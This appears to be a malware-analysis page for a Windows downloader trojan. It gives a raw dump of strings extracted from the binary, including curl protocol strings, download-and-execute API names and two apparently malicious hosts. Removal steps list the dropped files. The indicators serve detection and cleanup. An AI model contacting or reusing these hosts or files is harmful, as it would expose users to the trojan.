APPEND %s (\Seen) {%I64d}SEARCH %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
IMAPS not supported!
%c%03d
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
POP3S not supported!
SMTP
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
SMTPS not supported!
PORT
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
%s%s%s
MDTM %s
APPE %s
STOR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: %03d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
%04d%02d%02d%02d%02d%02d
%04d%02d%02d %02d:%02d:%02d GMT
Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT
unsupported MDTM reply format
Got a %03d response code instead of the assumed 200
ftp server doesn't support SIZE
RETR %s
Failed FTP upload:
RETR response: %03d
PBSZ %d
ACCT %s
Access denied: %03d
ACCT rejected by server: %03d
Got a %03d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with %03d
MKD %s
Failed to MKD dir: %03d
PRET command not accepted: %03d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
curl
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%02x%02x:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------%08x%08x
%c%c==
%c%c%c=
LOGIN
%s/%s
%s xxxxxxxxxxxxxxxx
00000001
%08x%08x%08x%08x
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
%s:%s:%s
%s:%s:%08x:%s:%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
user=%s
auth=Bearer %s
Unsupported SASL authentication mechanism
0123456789-
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
1.2.8
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
curl_global_init failed: %d
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
SELECT * FROM Win32_OperatingSystem
InternetOpenUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
URLDownloadToFileW
ShellExecuteW
C:\Users\Administrator\Desktop\Q
\Release\nmjh.pdb
WLDAP32.dll
WS2_32.dll
PeekNamedPipe
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
CryptDestroyKey
CryptImportKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
IPHLPAPI.DLL
GetCPInfo
GetProcessHeap
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
kernel32.dll
Gateway:0.0.0.0
c:\Program Files\
#{ad498944-762f-11d0-8dcb-00c04fc3358c}wininet.dll
Mozilla/4.0 (compatible)
urlmon.dll
s.tianyuanjyh.com
shell32.dll
VVV.yytv8.com
%d-%d-%d
%d-%d-%d-%d-%d-%d
C:\uuuyunbo_53_1248.exe
1.0.0.1
YunBOWin.exe
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
uuuyunbo_53_1248.exe:1536
%original file name%.exe:652
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\setup_30004.exe (1930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Setup_95101248.exe (7386 bytes)
C:\uuuyunbo_53_1248.exe (7386 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.